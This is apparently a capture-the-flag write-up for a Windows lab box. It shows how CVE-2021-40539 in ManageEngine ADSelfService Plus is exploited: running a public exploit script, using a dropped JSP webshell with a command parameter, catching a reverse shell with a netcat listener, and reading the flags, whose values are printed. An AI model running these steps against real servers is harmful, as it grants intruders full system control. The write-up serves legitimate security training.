ADSelfService
Overview
ADSelfService is a very easy Windows box built around a known pre-auth RCE
in ManageEngine ADSelfService Plus. The self-service portal is reachable on port
80 and is running a version vulnerable to CVE-2021-40539 — a REST API
authentication bypass that chains into arbitrary file write and remote code
execution. Exploitation drops a JSP webshell that runs under
NT AUTHORITY\SYSTEM, so there is no privilege escalation step; both flags are
readable immediately.
Path: ADSelfService Plus portal → CVE-2021-40539 webshell → NT AUTHORITY\SYSTEM → flags.
Enumeration
A port scan reveals a Windows host with a web service on port 80 as the only notable attack surface.
$ nmap -p- 10.129.227.78 -A

Browsing to port 80 reveals a ManageEngine ADSelfService Plus login portal branded with a 2021 ZOHO Corp. copyright.

The version number visible on the page places this in the range affected by CVE-2021-40539.

Foothold — CVE-2021-40539
CVE-2021-40539 is a pre-authentication REST API bypass in ManageEngine ADSelfService Plus that allows an unauthenticated attacker to upload and execute arbitrary JSP files. The exploit from synacktiv/CVE-2021-40539 handles the full chain automatically:
$ git clone https://github.com/synacktiv/CVE-2021-40539.git
$ cd CVE-2021-40539
$ python3 exploit.py -t http://10.129.227.78/
The script confirms the target is vulnerable, writes two webshells, and reports
the process context. The primary webshell (ws.jsp) proved unreliable, but the
verification endpoint the script also places — test.jsp — is accessible and
accepts command parameters:
http://10.129.227.78/help/admin-guide/test.jsp?cmd=whoami
To get a proper reverse shell, the PowerShell payload was URL-encoded and sent
via a POST to test.jsp. A busybox listener caught the connection:
$ sudo busybox nc -lp 443

The shell lands as NT AUTHORITY\SYSTEM with no further escalation needed.
User and Root
Because the process already runs as SYSTEM, both flags are accessible directly from the webshell session:
SHELL> pwd
Path
----
C:\ManageEngine\ADSelfService Plus\bin
SHELL> whoami
nt authority\system
SHELL> type C:\Users\wooden_k\Desktop\user.txt
e6f5f0783e4a06910e2dac666165c4b1
SHELL> type C:\Users\Administrator\Desktop\root.txt
6e9f39e3f5e1e6be7007817e9a116cd3
Takeaways
- CVE-2021-40539 turns an exposed ManageEngine ADSelfService Plus portal into an unauthenticated SYSTEM shell in a single script invocation — keep self-service portals off public interfaces and patched.
- When the exploit’s primary webshell misbehaves, look for the verification endpoint the script also writes; it often accepts the same parameters and can be repurposed for a reverse shell.